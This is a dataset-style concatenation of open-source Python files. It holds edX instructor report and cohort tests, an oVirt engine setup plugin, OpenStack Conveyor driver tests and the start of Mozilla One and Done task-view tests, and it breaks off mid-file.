task_input, 'generating executive summary report'
)
ReportStore.from_config(config_name='FINANCIAL_REPORTS')
self.assertDictContainsSubset({'attempted': 1, 'succeeded': 1, 'failed': 0}, result)
def students_purchases(self):
"""
Students purchases the courses using enrollment
and coupon codes.
"""
self.client.login(username=self.student1.username, password='test')
paid_course_reg_item = PaidCourseRegistration.add_to_order(self.student1_cart, self.course.id)
# update the quantity of the cart item paid_course_reg_item
resp = self.client.post(reverse('shoppingcart.views.update_user_cart'), {
'ItemId': paid_course_reg_item.id, 'qty': '4'
})
self.assertEqual(resp.status_code, 200)
# apply the coupon code to the item in the cart
resp = self.client.post(reverse('shoppingcart.views.use_code'), {'code': 'coupon1'})
self.assertEqual(resp.status_code, 200)
self.student1_cart.purchase()
course_reg_codes = CourseRegistrationCode.objects.filter(order=self.student1_cart)
redeem_url = reverse('register_code_redemption', args=[course_reg_codes[0].code])
response = self.client.get(redeem_url)
self.assertEquals(response.status_code, 200)
# check button text
self.assertTrue('Activate Course Enrollment' in response.content)
response = self.client.post(redeem_url)
self.assertEquals(response.status_code, 200)
self.client.login(username=self.student2.username, password='test')
PaidCourseRegistration.add_to_order(self.student2_cart, self.course.id)
# apply the coupon code to the item in the cart
resp = self.client.post(reverse('shoppingcart.views.use_code'), {'code': 'coupon1'})
self.assertEqual(resp.status_code, 200)
self.student2_cart.purchase()
@patch.dict('django.conf.settings.FEATURES', {'ENABLE_PAID_COURSE_REGISTRATION': True})
def test_generate_executive_summary_report(self):
"""
test to generate executive summary report
and then test the report authenticity.
"""
self.students_purchases()
task_input = {'features': []}
with patch('instructor_task.tasks_helper._get_current_task'):
result = upload_exec_summary_report(
None, None, self.course.id,
task_input, 'generating executive summary report'
)
report_store = ReportStore.from_config(config_name='FINANCIAL_REPORTS')
expected_data = [
'Gross Revenue Collected', '$1481.82',
'Gross Revenue Pending', '$0.00',
'Average Price per Seat', '$296.36',
'Number of seats purchased using coupon codes', '<td>2</td>'
]
self.assertDictContainsSubset({'attempted': 1, 'succeeded': 1, 'failed': 0}, result)
self._verify_html_file_report(report_store, expected_data)
def _verify_html_file_report(self, report_store, expected_data):
"""
Verify grade report data.
"""
report_html_filename = report_store.links_for(self.course.id)[0][0]
with open(report_store.path_to(self.course.id, report_html_filename)) as html_file:
html_file_data = html_file.read()
for data in expected_data:
self.assertTrue(data in html_file_data)
@ddt.ddt
class TestStudentReport(TestReportMixin, InstructorTaskCourseTestCase):
"""
Tests that CSV student profile report generation works.
"""
def setUp(self):
super(TestStudentReport, self).setUp()
self.course = CourseFactory.create()
def test_success(self):
self.create_student('student', 'student@example.com')
task_input = {'features': []}
with patch('instructor_task.tasks_helper._get_current_task'):
result = upload_students_csv(None, None, self.course.id, task_input, 'calculated')
report_store = ReportStore.from_config(config_name='GRADES_DOWNLOAD')
links = report_store.links_for(self.course.id)
self.assertEquals(len(links), 1)
self.assertDictContainsSubset({'attempted': 1, 'succeeded': 1, 'failed': 0}, result)
@ddt.data([u'student', u'student\xec'])
def test_unicode_usernames(self, students):
"""
Test that students with unicode characters in their usernames
are handled.
"""
for i, student in enumerate(students):
self.create_student(username=student, email='student{0}@example.com'.format(i))
self.current_task = Mock()
self.current_task.update_state = Mock()
task_input = {
'features': [
'id', 'username', 'name', 'email', 'language', 'location',
'year_of_birth', 'gender', 'level_of_education', 'mailing_address',
'goals'
]
}
with patch('instructor_task.tasks_helper._get_current_task') as mock_current_task:
mock_current_task.return_value = self.current_task
result = upload_students_csv(None, None, self.course.id, task_input, 'calculated')
# This assertion simply confirms that the generation completed with no errors
num_students = len(students)
self.assertDictContainsSubset({'attempted': num_students, 'succeeded': num_students, 'failed': 0}, result)
@ddt.ddt
class TestListMayEnroll(TestReportMixin, InstructorTaskCourseTestCase):
"""
Tests that generation of CSV files containing information about
students who may enroll in a given course (but have not signed up
for it yet) works.
"""
def _create_enrollment(self, email):
"Factory method for creating CourseEnrollmentAllowed objects."
return CourseEnrollmentAllowed.objects.create(
email=email, course_id=self.course.id
)
def setUp(self):
super(TestListMayEnroll, self).setUp()
self.course = CourseFactory.create()
def test_success(self):
self._create_enrollment('user@example.com')
task_input = {'features': []}
with patch('instructor_task.tasks_helper._get_current_task'):
result = upload_may_enroll_csv(None, None, self.course.id, task_input, 'calculated')
report_store = ReportStore.from_config(config_name='GRADES_DOWNLOAD')
links = report_store.links_for(self.course.id)
self.assertEquals(len(links), 1)
self.assertDictContainsSubset({'attempted': 1, 'succeeded': 1, 'failed': 0}, result)
def test_unicode_email_addresses(self):
"""
Test handling of unicode characters in email addresses of students
who may enroll in a course.
"""
enrollments = [u'student@example.com', u'ni\xf1o@example.com']
for email in enrollments:
self._create_enrollment(email)
task_input = {'features': ['email']}
with patch('instructor_task.tasks_helper._get_current_task'):
result = upload_may_enroll_csv(None, None, self.course.id, task_input, 'calculated')
# This assertion simply confirms that the generation completed with no errors
num_enrollments = len(enrollments)
self.assertDictContainsSubset({'attempted': num_enrollments, 'succeeded': num_enrollments, 'failed': 0}, result)
class MockDefaultStorage(object):
"""Mock django's DefaultStorage"""
def __init__(self):
pass
def open(self, file_name):
"""Mock out DefaultStorage.open with standard python open"""
return open(file_name)
@patch('instructor_task.tasks_helper.DefaultStorage', new=MockDefaultStorage)
class TestCohortStudents(TestReportMixin, InstructorTaskCourseTestCase):
"""
Tests that bulk student cohorting works.
"""
def setUp(self):
super(TestCohortStudents, self).setUp()
self.course = CourseFactory.create()
self.cohort_1 = CohortFactory(course_id=self.course.id, name='Cohort 1')
self.cohort_2 = CohortFactory(course_id=self.course.id, name='Cohort 2')
self.student_1 = self.create_student(username=u'student_1\xec', email='student_1@example.com')
self.student_2 = self.create_student(username='student_2', email='student_2@example.com')
self.csv_header_row = ['Cohort Name', 'Exists', 'Students Added', 'Students Not Found']
def _cohort_students_and_upload(self, csv_data):
"""
Call `cohort_students_and_upload` with a file generated from `csv_data`.
"""
with tempfile.NamedTemporaryFile() as temp_file:
temp_file.write(csv_data.encode('utf-8'))
temp_file.flush()
with patch('instructor_task.tasks_helper._get_current_task'):
return cohort_students_and_upload(None, None, self.course.id, {'file_name': temp_file.name}, 'cohorted')
def test_username(self):
result = self._cohort_students_and_upload(
u'username,email,cohort\n'
u'student_1\xec,,Cohort 1\n'
u'student_2,,Cohort 2'
)
self.assertDictContainsSubset({'total': 2, 'attempted': 2, 'succeeded': 2, 'failed': 0}, result)
self.verify_rows_in_csv(
[
dict(zip(self.csv_header_row, ['Cohort 1', 'True', '1', ''])),
dict(zip(self.csv_header_row, ['Cohort 2', 'True', '1', ''])),
],
verify_order=False
)
def test_email(self):
result = self._cohort_students_and_upload(
'username,email,cohort\n'
',student_1@example.com,Cohort 1\n'
',student_2@example.com,Cohort 2'
)
self.assertDictContainsSubset({'total': 2, 'attempted': 2, 'succeeded': 2, 'failed': 0}, result)
self.verify_rows_in_csv(
[
dict(zip(self.csv_header_row, ['Cohort 1', 'True', '1', ''])),
dict(zip(self.csv_header_row, ['Cohort 2', 'True', '1', ''])),
],
verify_order=False
)
def test_username_and_email(self):
result = self._cohort_students_and_upload(
u'username,email,cohort\n'
u'student_1\xec,student_1@example.com,Cohort 1\n'
u'student_2,student_2@example.com,Cohort 2'
)
self.assertDictContainsSubset({'total': 2, 'attempted': 2, 'succeeded': 2, 'failed': 0}, result)
self.verify_rows_in_csv(
[
dict(zip(self.csv_header_row, ['Cohort 1', 'True', '1', ''])),
dict(zip(self.csv_header_row, ['Cohort 2', 'True', '1', ''])),
],
verify_order=False
)
def test_prefer_email(self):
"""
Test that `cohort_students_and_upload` greedily prefers 'email' over
'username' when identifying the user. This means that if a correct
email is present, an incorrect or non-matching username will simply be
ignored.
"""
result = self._cohort_students_and_upload(
u'username,email,cohort\n'
u'student_1\xec,student_1@example.com,Cohort 1\n' # valid username and email
u'Invalid,student_2@example.com,Cohort 2' # invalid username, valid email
)
self.assertDictContainsSubset({'total': 2, 'attempted': 2, 'succeeded': 2, 'failed': 0}, result)
self.verify_rows_in_csv(
[
dict(zip(self.csv_header_row, ['Cohort 1', 'True', '1', ''])),
dict(zip(self.csv_header_row, ['Cohort 2', 'True', '1', ''])),
],
verify_order=False
)
def test_non_existent_user(self):
result = self._cohort_students_and_upload(
'username,email,cohort\n'
'Invalid,,Cohort 1\n'
'student_2,also_fake@bad.com,Cohort 2'
)
self.assertDictContainsSubset({'total': 2, 'attempted': 2, 'succeeded': 0, 'failed': 2}, result)
self.verify_rows_in_csv(
[
dict(zip(self.csv_header_row, ['Cohort 1', 'True', '0', 'Invalid'])),
dict(zip(self.csv_header_row, ['Cohort 2', 'True', '0', 'also_fake@bad.com'])),
],
verify_order=False
)
def test_non_existent_cohort(self):
result = self._cohort_students_and_upload(
'username,email,cohort\n'
',student_1@example.com,Does Not Exist\n'
'student_2,,Cohort 2'
)
self.assertDictContainsSubset({'total': 2, 'attempted': 2, 'succeeded': 1, 'failed': 1}, result)
self.verify_rows_in_csv(
[
dict(zip(self.csv_header_row, ['Does Not Exist', 'False', '0', ''])),
dict(zip(self.csv_header_row, ['Cohort 2', 'True', '1', ''])),
],
verify_order=False
)
def test_too_few_commas(self):
"""
A CSV file may be malformed and lack traling commas at the end of a row.
In this case, those cells take on the value None by the CSV parser.
Make sure we handle None values appropriately.
i.e.:
header_1,header_2,header_3
val_1,val_2,val_3 <- good row
val_1,, <- good row
val_1 <- bad row; no trailing commas to indicate empty rows
"""
result = self._cohort_students_and_upload(
u'username,email,cohort\n'
u'student_1\xec,\n'
u'student_2'
)
self.assertDictContainsSubset({'total': 2, 'attempted': 2, 'succeeded': 0, 'failed': 2}, result)
self.verify_rows_in_csv(
[
dict(zip(self.csv_header_row, ['', 'False', '0', ''])),
],
verify_order=False
)
def test_only_header_row(self):
result = self._cohort_students_and_upload(
u'username,email,cohort'
)
self.assertDictContainsSubset({'total': 0, 'attempted': 0, 'succeeded': 0, 'failed': 0}, result)
self.verify_rows_in_csv([])
def test_carriage_return(self):
"""
Test that we can handle carriage returns in our file.
"""
result = self._cohort_students_and_upload(
u'username,email,cohort\r'
u'student_1\xec,,Cohort 1\r'
u'student_2,,Cohort 2'
)
self.assertDictContainsSubset({'total': 2, 'attempted': 2, 'succeeded': 2, 'failed': 0}, result)
self.verify_rows_in_csv(
[
dict(zip(self.csv_header_row, ['Cohort 1', 'True', '1', ''])),
dict(zip(self.csv_header_row, ['Cohort 2', 'True', '1', ''])),
],
verify_order=False
)
def test_carriage_return_line_feed(self):
"""
Test that we can handle carriage returns and line feeds in our file.
"""
result = self._cohort_students_and_upload(
u'username,email,cohort\r\n'
u'student_1\xec,,Cohort 1\r\n'
u'student_2,,Cohort 2'
)
self.assertDictContainsSubset({'total': 2, 'attempted': 2, 'succeeded': 2, 'failed': 0}, result)
self.verify_rows_in_csv(
[
dict(zip(self.csv_header_row, ['Cohort 1', 'True', '1', ''])),
dict(zip(self.csv_header_row, ['Cohort 2', 'True', '1', ''])),
],
verify_order=False
)
def test_move_users_to_new_cohort(self):
self.cohort_1.users.add(self.student_1)
self.cohort_2.users.add(self.student_2)
result = self._cohort_students_and_upload(
u'username,email,cohort\n'
u'student_1\xec,,Cohort 2\n'
u'student_2,,Cohort 1'
)
self.assertDictContainsSubset({'total': 2, 'attempted': 2, 'succeeded': 2, 'failed': 0}, result)
self.verify_rows_in_csv(
[
dict(zip(self.csv_header_row, ['Cohort 1', 'True', '1', ''])),
dict(zip(self.csv_header_row, ['Cohort 2', 'True', '1', ''])),
],
verify_order=False
)
def test_move_users_to_same_cohort(self):
self.cohort_1.users.add(self.student_1)
self.cohort_2.users.add(self.student_2)
result = self._cohort_students_and_upload(
u'username,email,cohort\n'
u'student_1\xec,,Cohort 1\n'
u'student_2,,Cohort 2'
)
self.assertDictContainsSubset({'total': 2, 'attempted': 2, 'skipped': 2, 'failed': 0}, result)
self.verify_rows_in_csv(
[
dict(zip(self.csv_header_row, ['Cohort 1', 'True', '0', ''])),
dict(zip(self.csv_header_row, ['Cohort 2', 'True', '0', ''])),
],
verify_order=False
)
@ddt.ddt
@patch('instructor_task.tasks_helper.DefaultStorage', new=MockDefaultStorage)
class TestGradeReportEnrollmentAndCertificateInfo(TestReportMixin, InstructorTaskModuleTestCase):
"""
Test that grade report has correct user enrolment, verification, and certificate information.
"""
def setUp(self):
super(TestGradeReportEnrollmentAndCertificateInfo, self).setUp()
self.initialize_course()
self.create_problem()
self.columns_to_check = [
'Enrollment Track',
'Verification Status',
'Certificate Eligible',
'Certificate Delivered',
'Certificate Type'
]
def create_problem(self, problem_display_name='test_problem', parent=None):
"""
Create a multiple choice response problem.
"""
if parent is None:
parent = self.problem_section
factory = MultipleChoiceResponseXMLFactory()
args = {'choices': [False, True, False]}
problem_xml = factory.build_xml(**args)
ItemFactory.create(
parent_location=parent.location,
parent=parent,
category="problem",
display_name=problem_display_name,
data=problem_xml
)
def user_is_embargoed(self, user, is_embargoed):
"""
Set a users emabargo state.
"""
user_profile = UserFactory(username=user.username, email=user.email).profile
user_profile.allow_certificate = not is_embargoed
user_profile.save()
def _verify_csv_data(self, username, expected_data):
"""
Verify grade report data.
"""
with patch('instructor_task.tasks_helper._get_current_task'):
upload_grades_csv(None, None, self.course.id, None, 'graded')
report_store = ReportStore.from_config(config_name='GRADES_DOWNLOAD')
report_csv_filename = report_store.links_for(self.course.id)[0][0]
with open(report_store.path_to(self.course.id, report_csv_filename)) as csv_file:
for row in unicodecsv.DictReader(csv_file):
if row.get('username') == username:
csv_row_data = [row[column] for column in self.columns_to_check]
self.assertEqual(csv_row_data, expected_data)
def _create_user_data(self,
user_enroll_mode,
has_passed,
whitelisted,
is_embargoed,
verification_status,
certificate_status,
certificate_mode):
"""
Create user data to be used during grade report generation.
"""
user = self.create_student('u1', mode=user_enroll_mode)
if has_passed:
self.submit_student_answer('u1', 'test_problem', ['choice_1'])
CertificateWhitelistFactory.create(user=user, course_id=self.course.id, whitelist=whitelisted)
self.user_is_embargoed(user, is_embargoed)
if user_enroll_mode in CourseMode.VERIFIED_MODES:
SoftwareSecurePhotoVerificationFactory.create(user=user, status=verification_status)
GeneratedCertificateFactory.create(
user=user,
course_id=self.course.id,
status=certificate_status,
mode=certificate_mode
)
return user
@ddt.data(
(
'verified', False, False, False, 'approved', 'notpassing', 'honor',
['verified', 'ID Verified', 'N', 'N', 'N/A']
),
(
'verified', False, True, False, 'approved', 'downloadable', 'verified',
['verified', 'ID Verified', 'Y', 'Y', 'verified']
),
(
'honor', True, True, True, 'approved', 'restricted', 'honor',
['honor', 'N/A', 'N', 'N', 'N/A']
),
(
'verified', True, True, False, 'must_retry', 'downloadable', 'honor',
['verified', 'Not ID Verified', 'Y', 'Y', 'honor']
),
)
@ddt.unpack
def test_grade_report_enrollment_and_certificate_info(
self,
user_enroll_mode,
has_passed,
whitelisted,
is_embargoed,
verification_status,
certificate_status,
certificate_mode,
expected_output
):
user = self._create_user_data(
user_enroll_mode,
has_passed,
whitelisted,
is_embargoed,
verification_status,
certificate_status,
certificate_mode
)
self._verify_csv_data(user.username, expected_output)
@override_settings(CERT_QUEUE='test-queue')
class TestCertificateGeneration(InstructorTaskModuleTestCase):
"""
Test certificate generation task works.
"""
def setUp(self):
super(TestCertificateGeneration, self).setUp()
self.initialize_course()
def test_certificate_generation_for_students(self):
"""
Verify that certificates generated for all eligible students enrolled in a course.
"""
# create 10 students
students = [self.create_student(username='student_{}'.format(i), email='student_{}@example.com'.format(i))
for i in xrange(1, 11)]
# mark 2 students to have certificates generated already
for student in students[:2]:
GeneratedCertificateFactory.create(
user=student,
course_id=self.course.id,
status=CertificateStatuses.downloadable,
mode='honor'
)
# white-list 5 students
for student in students[2:7]:
CertificateWhitelistFactory.create(user=student, course_id=self.course.id, whitelist=True)
current_task = Mock()
current_task.update_state = Mock()
with self.assertNumQueries(104):
with patch('instructor_task.tasks_helper._get_current_task') as mock_current_task:
mock_current_task.return_value = current_task
with patch('capa.xqueue_interface.XQueueInterface.send_to_queue') as mock_queue:
mock_queue.return_value = (0, "Successfully queued")
result = generate_students_certificates(None, None, self.course.id, None, 'certificates generated')
self.assertDictContainsSubset(
{
'action_name': 'certificates generated',
'total': 10,
'attempted': 8,
'succeeded': 5,
'failed': 3,
'skipped': 2
},
result
)
| agpl-3.0 |
yingyun001/ovirt-engine | packaging/setup/plugins/ovirt-engine-rename/ovirt-engine/engine.py | 8 | 1604 |
#
# ovirt-engine-setup -- ovirt engine setup
# Copyright (C) 2013-2015 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Misc plugin."""
import gettext
from otopi import plugin, util
from ovirt_engine_setup import constants as osetupcons
from ovirt_engine_setup.engine import constants as oenginecons
from ovirt_engine_setup.engine_common import constants as oengcommcons
def _(m):
return gettext.dgettext(message=m, domain='ovirt-engine-setup')
@util.export
class Plugin(plugin.PluginBase):
"""Misc plugin."""
def __init__(self, context):
super(Plugin, self).__init__(context=context)
@plugin.event(
stage=plugin.Stages.STAGE_CLOSEUP,
name=oengcommcons.Stages.CORE_ENGINE_START,
condition=lambda self: not self.environment[
osetupcons.CoreEnv.DEVELOPER_MODE
],
)
def _closeup(self):
self.logger.info(_('Starting engine service'))
self.services.state(
name=oenginecons.Const.ENGINE_SERVICE_NAME,
state=True,
)
# vim: expandtab tabstop=4 shiftwidth=4
| apache-2.0 |
Hybrid-Cloud/conveyor | conveyor/tests/unit/clone/drivers/openstack/test_driver.py | 1 | 5751 | # Copyright 2016 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from conveyor.clone.drivers import driver as base_driver
from conveyor.clone.drivers.openstack import driver
from conveyor.clone.resources import common
from conveyor.common import config
from conveyor.conveyoragentclient.v1 import client as birdiegatewayclient
from conveyor.conveyorheat.api import api
from conveyor.resource import resource
from conveyor.tests import test
from conveyor.tests.unit import fake_constants
from conveyor import context
from conveyor import utils
CONF = config.CONF
class OpenstackDriverTestCase(test.TestCase):
def setUp(self):
super(OpenstackDriverTestCase, self).setUp()
self.context = context.RequestContext('fake', 'fake', is_admin=False)
self.manager = driver.OpenstackDriver()
def test_handle_resources(self):
pass
@mock.patch.object(base_driver.BaseDriver, '_handle_dv_for_svm')
def test_add_extra_properties_for_server(self, mock_svm):
template = fake_constants.FAKE_INSTANCE_TEMPLATE['template']
template['resources']['server_0']['extra_properties'].pop('gw_url')
res_map = {}
for key, value in template['resources'].items():
res_map[key] = resource.Resource.from_dict(value)
undo_mgr = utils.UndoManager()
utils.get_next_vgw = mock.MagicMock()
utils.get_next_vgw.return_value = ('123', '10.0.0.1')
self.assertEqual(
None,
self.manager.add_extra_properties_for_server(
self.context, res_map['server_0'], res_map,
False, True, undo_mgr))
@mock.patch.object(base_driver.BaseDriver, '_handle_dv_for_svm')
def test_add_extra_properties_for_server_with_active(self, mock_svm):
template = fake_constants.FAKE_INSTANCE_TEMPLATE['template']
template['resources']['server_0']['extra_properties'].pop('gw_url')
template['resources']['server_0']['extra_properties']['vm_state'] = \
'active'
res_map = {}
for key, value in template['resources'].items():
res_map[key] = resource.Resource.from_dict(value)
undo_mgr = utils.UndoManager()
utils.get_next_vgw = mock.MagicMock()
utils.get_next_vgw.return_value = ('123', '10.0.0.1')
self.assertEqual(
None,
self.manager.add_extra_properties_for_server(
self.context, res_map['server_0'], res_map,
False, True, undo_mgr))
def test_add_extra_properties_for_stack(self):
undo_mgr = utils.UndoManager()
template = fake_constants.FAKE_PLAN['updated_resources']
stack = resource.Resource.from_dict(template['stack_0'])
self.manager.heat_api.get_resource = mock.MagicMock()
self.manager.heat_api.get_resource.return_value = \
api.Resource(api.format_resource(fake_constants.FAKE_RESOURCE))
self.manager.compute_api.get_server = mock.MagicMock()
self.manager.compute_api.get_server.return_value = \
{'OS-EXT-STS:vm_state': 'active'}
self.assertEqual(
None,
self.manager.add_extra_properties_for_stack(
self.context, stack, False, True, undo_mgr
))
@mock.patch.object(base_driver.BaseDriver, '_wait_for_volume_status')
@mock.patch.object(birdiegatewayclient, 'get_birdiegateway_client')
def test_handle_server_after_clone(self, mock_client, mock_wait):
template = \
fake_constants.FAKE_INSTANCE_TEMPLATE['template']['resources']
template['volume_1']['extra_properties']['sys_clone'] = True
self.manager.compute_api.migrate_interface_detach = mock.MagicMock()
self.manager.compute_api.migrate_interface_detach.return_value = None
mock_client.return_value = birdiegatewayclient.Client()
mock_client.return_value.vservices._force_umount_disk = \
mock.MagicMock()
mock_client.return_value.vservices._force_umount_disk.return_value = \
None
self.manager.compute_api.stop_server = mock.MagicMock()
self.manager.compute_api.stop_server.return_value = None
self.manager.compute_api.detach_volume = mock.MagicMock()
self.manager.compute_api.detach_volume.return_value = None
common.ResourceCommon._await_instance_status = mock.MagicMock()
common.ResourceCommon._await_instance_status.return_value = None
self.manager.compute_api.attach_volume = mock.MagicMock()
self.manager.compute_api.attach_volume.return_value = None
self.manager.compute_api.start_server = mock.MagicMock()
self.manager.compute_api.start_server.return_value = None
self.assertEqual(
None,
self.manager.handle_server_after_clone(
self.context, template['server_0'], template
))
def test_handle_stack_after_clone(self):
template = \
fake_constants.FAKE_PLAN['updated_resources']['stack_0']
self.assertEqual(
None,
self.manager.handle_stack_after_clone(
self.context, template, {}
))
| apache-2.0 |
bobsilverberg/oneanddone | oneanddone/tasks/tests/test_views.py | 4 | 17708 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from django.core.urlresolvers import reverse
from django.http import HttpRequest
from django.utils.translation import ugettext as _
from mock import Mock, patch
from nose.tools import eq_, ok_, assert_dict_contains_subset
from oneanddone.base.tests import TestCase
from oneanddone.tasks import views
from oneanddone.tasks.forms import (TaskImportBatchForm,
TaskForm,
TaskInvalidCriteriaFormSet)
from oneanddone.tasks.models import (BugzillaBug, Task, TaskAttempt,
TaskImportBatch)
from oneanddone.tasks.tests import (TaskFactory,
TaskImportBatchFactory,
TaskInvalidationCriterionFactory,
TaskKeywordFactory)
from oneanddone.tasks.tests.test_forms import get_filled_taskform
from oneanddone.users.tests import UserFactory
class CreateTaskViewTests(TestCase):
def setUp(self):
self.view = views.CreateTaskView()
def test_get_context_data_returns_add_action_and_url(self):
"""
The 'Add' action and correct cancel_url
should be included in the context data.
"""
context_patch = patch('oneanddone.tasks.views.generic.CreateView.get_context_data')
with context_patch as get_context_data:
get_context_data.return_value = {}
ctx = self.view.get_context_data()
eq_(ctx['action'], 'Add')
eq_(ctx['cancel_url'], reverse('tasks.list'))
def test_get_form_kwargs_sets_initial_owner_to_current_user(self):
"""
The initial owner for the form should be set to the current user.
"""
user = UserFactory.create()
self.view.request = Mock(user=user)
self.view.kwargs = {}
with patch('oneanddone.tasks.views.generic.CreateView.get_form_kwargs') as get_form_kwargs:
get_form_kwargs.return_value = {'initial': {}}
kwargs = self.view.get_form_kwargs()
eq_(kwargs['initial']['owner'], user)
def test_get_form_kwargs_populates_form_with_data_to_be_cloned(self):
"""
When accessed via the tasks.clone url, the view displays a form
whose initial data is that of the task being cloned, except for
the 'name' field, which should be prefixed with 'Copy of '
"""
user = UserFactory.create()
original_task = TaskFactory.create()
TaskKeywordFactory.create_batch(3, task=original_task)
original_data = get_filled_taskform(original_task).data
self.view.kwargs = {'clone': original_task.pk}
self.view.request = Mock(user=user)
with patch('oneanddone.tasks.views.generic.CreateView.get_form_kwargs') as get_form_kwargs:
get_form_kwargs.return_value = {'initial': {}}
initial = self.view.get_form_kwargs()['initial']
eq_(initial['keywords'], original_task.keywords_list)
eq_(initial['name'], ' '.join(['Copy of', original_task.name]))
del original_data['name']
assert_dict_contains_subset(original_data, initial)
class RandomTasksViewTests(TestCase):
def setUp(self):
self.view = views.RandomTasksView()
def test_get_context_data_returns_slice(self):
"""
A subset of 5 items should be returned when Random tasks are viewed.
"""
with patch('oneanddone.tasks.views.generic.ListView.get_context_data') as get_context_data:
get_context_data.return_value = {'object_list': [i for i in range(0, 10)]}
ctx = self.view.get_context_data()
eq_(len(ctx['random_task_list']), 5)
class StartTaskViewTests(TestCase):
def setUp(self):
self.view = views.StartTaskView()
self.task = TaskFactory.create()
self.view.get_object = Mock(return_value=self.task)
def test_post_create_attempt(self):
"""
If the task is available and the user doesn't have any tasks in
progress, create a new task attempt and redirect to its page.
"""
user = UserFactory.create()
self.view.request = Mock(user=user)
with patch('oneanddone.tasks.views.redirect') as redirect:
eq_(self.view.post(), redirect.return_value)
redirect.assert_called_with(self.task)
ok_(TaskAttempt.objects.filter(user=user, task=self.task, state=TaskAttempt.STARTED)
.exists())
def test_post_unavailable_task(self):
"""
If the task is unavailable, redirect to the available tasks view
without creating an attempt.
"""
self.task.is_draft = True
self.task.save()
user = UserFactory.create()
self.view.request = Mock(spec=HttpRequest,
_messages=Mock(),
user=user)
with patch('oneanddone.tasks.views.redirect') as redirect:
eq_(self.view.post(), redirect.return_value)
redirect.assert_called_with('tasks.available')
ok_(not TaskAttempt.objects.filter(user=user, task=self.task).exists())
class TaskDisplayViewTests(TestCase):
def setUp(self):
self.view = views.TaskDisplayView()
self.view.request = Mock(method='GET')
self.view.object = Mock()
self.view.object.name = 'name'
def test_get_context_data_authenticated(self):
"""
If the current user is authenticated, fetch their attempt for
the current task using get_object_or_none.
"""
self.view.request.user.is_authenticated.return_value = True
get_object_patch = patch('oneanddone.tasks.views.get_object_or_none')
context_patch = patch('oneanddone.tasks.views.generic.DetailView.get_context_data')
with get_object_patch as get_object_or_none, context_patch as get_context_data:
get_context_data.return_value = {}
ctx = self.view.get_context_data()
eq_(ctx['attempt'], get_object_or_none.return_value)
get_object_or_none.assert_called_with(TaskAttempt, user=self.view.request.user,
task=self.view.object, state=TaskAttempt.STARTED)
def test_get_context_data_available_task(self):
"""
If the task is taken, correct values should be added to the context.
"""
self.view.request.user.is_authenticated.return_value = False
self.view.object.is_taken = False
self.view.object.is_completed = False
context_patch = patch('oneanddone.tasks.views.generic.CreateView.get_context_data')
with context_patch as get_context_data:
get_context_data.return_value = {}
ctx = self.view.get_context_data()
eq_(ctx['gs_button_label'], _('Get Started'))
eq_(ctx['gs_button_disabled'], False)
def test_get_context_data_completed_task(self):
"""
If the task is taken, correct values should be added to the context.
"""
self.view.request.user.is_authenticated.return_value = False
self.view.object.is_taken = False
self.view.object.is_completed = True
context_patch = patch('oneanddone.tasks.views.generic.CreateView.get_context_data')
with context_patch as get_context_data:
get_context_data.return_value = {}
ctx = self.view.get_context_data()
eq_(ctx['gs_button_label'], _('Completed'))
eq_(ctx['gs_button_disabled'], True)
def test_get_context_data_not_authenticated(self):
"""
If the current user isn't authenticated, don't include an
attempt in the context.
"""
self.view.request.user.is_authenticated.return_value = False
context_patch = patch('oneanddone.tasks.views.generic.CreateView.get_context_data')
with context_patch as get_context_data:
get_context_data.return_value = {}
ctx = self.view.get_context_data()
ok_('attempt' not in ctx)
def test_get_context_data_taken_task(self):
"""
If the task is taken, correct values should be added to the context.
"""
self.view.request.user.is_authenticated.return_value = False
self.view.object.is_taken = True
context_patch = patch('oneanddone.tasks.views.generic.CreateView.get_context_data')
with context_patch as get_context_data:
get_context_data.return_value = {}
ctx = self.view.get_context_data()
eq_(ctx['gs_button_label'], _('Taken'))
eq_(ctx['gs_button_disabled'], True)
class TeamViewTests(TestCase):
def setUp(self):
self.view = views.TeamView()
self.view.request = Mock()
self.view.object = Mock()
self.view.object.name = 'name'
self.view.kwargs = {}
def test_get_context_data_additional_fields(self):
"""
context_data should include team and task_list_heading.
"""
team = Mock()
team.name = 'team name'
get_team_patch = patch('oneanddone.tasks.models.TaskTeam.get_team_by_id_or_url_code')
context_patch = patch('oneanddone.tasks.views.FilterView.get_context_data')
with get_team_patch as get_team, context_patch as get_context_data:
get_team.return_value = team
get_context_data.return_value = {}
ctx = self.view.get_context_data()
eq_(ctx['team'].name, 'team name')
eq_(ctx['task_list_heading'], _('team name Tasks'))
class UpdateTaskViewTests(TestCase):
def setUp(self):
self.view = views.UpdateTaskView()
def test_get_context_data_returns_update_action_and_url(self):
"""
The 'Update' action and correct cancel_url
should be included in the context data.
"""
get_object_patch = patch('oneanddone.tasks.views.generic.UpdateView.get_object')
context_patch = patch('oneanddone.tasks.views.generic.UpdateView.get_context_data')
with get_object_patch as get_object, context_patch as get_context_data:
get_object.return_value = Mock(id=1)
get_context_data.return_value = {}
ctx = self.view.get_context_data()
eq_(ctx['action'], 'Update')
eq_(ctx['cancel_url'], reverse('tasks.detail', args=[1]))
class ImportTasksViewTests(TestCase):
def setUp(self):
self.view = views.ImportTasksView()
self.view.request = Mock(spec=HttpRequest,
_messages=Mock(),
user=Mock())
def test_get_context_data_returns_import_action_and_url(self):
"""
The 'Import' action and correct cancel_url
should be included in the context data.
"""
with patch('oneanddone.tasks.views.generic.'
'TemplateView.get_context_data') as get_context_data:
get_context_data.return_value = {}
ctx = self.view.get_context_data()
eq_(ctx['action'], 'Import')
eq_(ctx['cancel_url'], reverse('tasks.list'))
def test_context_data_after_get_request_has_all_forms(self):
""" Four forms (task, batch, criterion, stage) should be
included in the content data.
"""
